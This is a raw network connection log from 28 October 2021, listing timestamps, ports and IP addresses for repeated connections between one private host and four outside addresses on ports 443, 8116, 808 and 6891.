Oct 28, 2021 05:28:42.650659084 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:42.650670052 CEST	443	50096	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:42.652292013 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.652375937 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.712244034 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.712266922 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.712483883 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.712496042 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.882453918 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.882481098 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:42.882689953 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.882735014 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.885072947 CEST	50097	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:42.944617987 CEST	8116	50097	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:43.005238056 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.005279064 CEST	443	50098	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:43.005399942 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.006143093 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.006155968 CEST	443	50098	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:43.367650986 CEST	443	50096	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:43.367736101 CEST	443	50096	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:43.367742062 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.367809057 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.375823021 CEST	50096	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.375855923 CEST	443	50096	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:43.491920948 CEST	50099	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:43.521281958 CEST	443	50098	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:43.521480083 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.522178888 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.522196054 CEST	443	50098	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:43.527734041 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.527755976 CEST	443	50098	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:43.527776003 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:43.527787924 CEST	443	50098	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:43.662852049 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:43.663655996 CEST	50099	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:43.663676023 CEST	50099	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:43.834563971 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:43.834628105 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:43.838505983 CEST	50099	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:43.838526011 CEST	50099	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:43.839288950 CEST	50099	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:43.839401960 CEST	50099	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.009341955 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.009829044 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.009967089 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.010128021 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.233289957 CEST	443	50098	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:44.233428001 CEST	443	50098	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:44.233508110 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:44.233530998 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:44.237018108 CEST	50098	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:44.237045050 CEST	443	50098	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:44.389766932 CEST	50100	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.399815083 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.399852037 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.400330067 CEST	50099	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.408910990 CEST	50099	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.523154974 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:44.549041986 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.549144983 CEST	50100	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.549937963 CEST	50100	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.580079079 CEST	808	50099	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.689318895 CEST	6891	50101	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:44.689996004 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:44.690865993 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:44.707653046 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.707710028 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.707813025 CEST	50100	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.708282948 CEST	50100	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.712075949 CEST	50100	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.712208986 CEST	50100	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:44.856898069 CEST	6891	50101	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:44.857007027 CEST	6891	50101	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:44.857104063 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:44.857650042 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:44.861738920 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:44.861893892 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:44.865931988 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.869730949 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.869761944 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.869844913 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:44.869869947 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:45.028740883 CEST	6891	50101	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.028763056 CEST	6891	50101	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.068753958 CEST	6891	50101	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.250368118 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:45.250395060 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:45.252667904 CEST	50100	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:45.256829023 CEST	50100	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:45.384629011 CEST	50102	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.410970926 CEST	6891	50101	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.410990000 CEST	6891	50101	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.411124945 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.411235094 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.414513111 CEST	808	50100	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:45.417094946 CEST	50101	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.550765038 CEST	6891	50102	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.551002979 CEST	50102	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.551829100 CEST	50102	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.583009005 CEST	6891	50101	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.609477997 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:45.663917065 CEST	8116	50103	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:45.664083958 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:45.665502071 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:45.717792988 CEST	6891	50102	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.717830896 CEST	6891	50102	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.718133926 CEST	50102	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.719360113 CEST	50102	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.719755888 CEST	8116	50103	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:45.720091105 CEST	8116	50103	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:45.720165014 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:45.721334934 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:45.727293015 CEST	50102	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.727560043 CEST	50102	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:45.729619980 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:45.729835987 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:45.783560038 CEST	8116	50103	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:45.783878088 CEST	8116	50103	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:45.820908070 CEST	8116	50103	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:45.893376112 CEST	6891	50102	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.893418074 CEST	6891	50102	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.893429995 CEST	6891	50102	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:45.954740047 CEST	8116	50103	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:45.954770088 CEST	8116	50103	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:45.954845905 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:45.954863071 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:45.960558891 CEST	50103	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.014491081 CEST	8116	50103	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.069377899 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.069417953 CEST	443	50104	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:46.069531918 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.070967913 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.070980072 CEST	443	50104	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:46.275523901 CEST	6891	50102	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:46.275547028 CEST	6891	50102	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:46.275697947 CEST	50102	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:46.278896093 CEST	50102	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:46.401289940 CEST	50105	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.444946051 CEST	6891	50102	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:46.456274033 CEST	8116	50105	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.456403017 CEST	50105	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.457689047 CEST	50105	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.511787891 CEST	8116	50105	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.511933088 CEST	8116	50105	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.512006044 CEST	50105	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.512600899 CEST	50105	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.517122030 CEST	50105	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.517249107 CEST	50105	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.571079969 CEST	8116	50105	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.571342945 CEST	8116	50105	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.571763039 CEST	8116	50105	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.587186098 CEST	443	50104	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:46.587277889 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.588154078 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.588171959 CEST	443	50104	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:46.593398094 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.593419075 CEST	443	50104	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:46.593655109 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.593677044 CEST	443	50104	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:46.763289928 CEST	8116	50105	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.763312101 CEST	8116	50105	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.763384104 CEST	50105	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.766391993 CEST	50105	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:46.820558071 CEST	8116	50105	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:46.886527061 CEST	50106	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.886584044 CEST	443	50106	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:46.886710882 CEST	50106	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.887422085 CEST	50106	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:46.887443066 CEST	443	50106	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:47.298732042 CEST	443	50104	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:47.298820972 CEST	443	50104	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:47.298955917 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:47.298979044 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:47.304893970 CEST	50104	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:47.304922104 CEST	443	50104	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:47.372409105 CEST	443	50106	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:47.372591972 CEST	50106	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:47.373377085 CEST	50106	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:47.373403072 CEST	443	50106	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:47.378583908 CEST	50106	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:47.378619909 CEST	443	50106	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:47.378722906 CEST	50106	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:47.378736973 CEST	443	50106	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:47.503988981 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:47.663638115 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:47.663777113 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:47.664623022 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:47.824059963 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:47.824140072 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:47.824212074 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:47.825119019 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:47.831593990 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:47.831667900 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:47.984971046 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:47.991045952 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:47.991080999 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:47.991096973 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.063453913 CEST	443	50106	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:48.063540936 CEST	443	50106	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:48.063939095 CEST	50106	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:48.070416927 CEST	50106	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:48.070472002 CEST	443	50106	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:48.247975111 CEST	50108	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.373331070 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.373361111 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.373486996 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.373532057 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.381872892 CEST	50107	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.414964914 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.415247917 CEST	50108	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.415889025 CEST	50108	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.491688967 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:48.542213917 CEST	808	50107	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.582638979 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.582715034 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.582798958 CEST	50108	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.583482027 CEST	50108	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.587784052 CEST	50108	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.587945938 CEST	50108	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:48.662158966 CEST	6891	50109	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:48.662400007 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:48.663208961 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:48.751575947 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.753166914 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.753191948 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.753266096 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:48.829138041 CEST	6891	50109	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:48.829212904 CEST	6891	50109	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:48.829416990 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:48.830049992 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:48.834670067 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:48.834790945 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.000670910 CEST	6891	50109	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.000710011 CEST	6891	50109	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.000720978 CEST	6891	50109	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.132904053 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:49.132937908 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:49.133111954 CEST	50108	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:49.135539055 CEST	50108	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:49.261691093 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.301589966 CEST	808	50108	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:49.384689093 CEST	6891	50109	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.384716988 CEST	6891	50109	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.384794950 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.384829044 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.390922070 CEST	50109	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.427967072 CEST	6891	50110	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.428107977 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.428864002 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.507213116 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.556751013 CEST	8116	50111	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:49.556907892 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.556991100 CEST	6891	50109	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.557626009 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.594894886 CEST	6891	50110	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.594970942 CEST	6891	50110	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.595035076 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.595664978 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.600013971 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.600152969 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:49.606815100 CEST	8116	50111	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:49.607001066 CEST	8116	50111	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:49.607055902 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.607600927 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.611578941 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.611778021 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.660798073 CEST	8116	50111	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:49.661159039 CEST	8116	50111	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:49.661838055 CEST	8116	50111	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:49.766814947 CEST	6891	50110	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.766840935 CEST	6891	50110	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.803335905 CEST	6891	50110	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:49.846223116 CEST	8116	50111	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:49.846249104 CEST	8116	50111	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:49.846299887 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.846329927 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.852485895 CEST	50111	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:49.901577950 CEST	8116	50111	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:49.959839106 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:49.959877014 CEST	443	50112	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:49.959969044 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:49.960424900 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:49.960437059 CEST	443	50112	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:50.146723986 CEST	6891	50110	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:50.146749020 CEST	6891	50110	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:50.146833897 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:50.146879911 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:50.151199102 CEST	50110	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:50.272582054 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.318202972 CEST	6891	50110	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:50.326067924 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.326303959 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.327466965 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.380650043 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.380875111 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.381015062 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.381881952 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.388540030 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.388763905 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.442925930 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.443193913 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.443465948 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.443816900 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.447321892 CEST	443	50112	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:50.447489977 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:50.448426962 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:50.448443890 CEST	443	50112	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:50.452078104 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:50.452100992 CEST	443	50112	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:50.452178955 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:50.452193022 CEST	443	50112	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:50.611112118 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.611145973 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.611196995 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.611222982 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.614234924 CEST	50113	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:50.667690992 CEST	8116	50113	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:50.746145964 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:50.746196985 CEST	443	50114	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:50.746298075 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:50.746926069 CEST	50114	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:50.746939898 CEST	443	50114	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:51.146179914 CEST	443	50112	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:51.146258116 CEST	443	50112	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:51.146372080 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.146464109 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.159955025 CEST	50112	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:51.159981966 CEST	443	50112	192.46.210.220	192.168.2.3
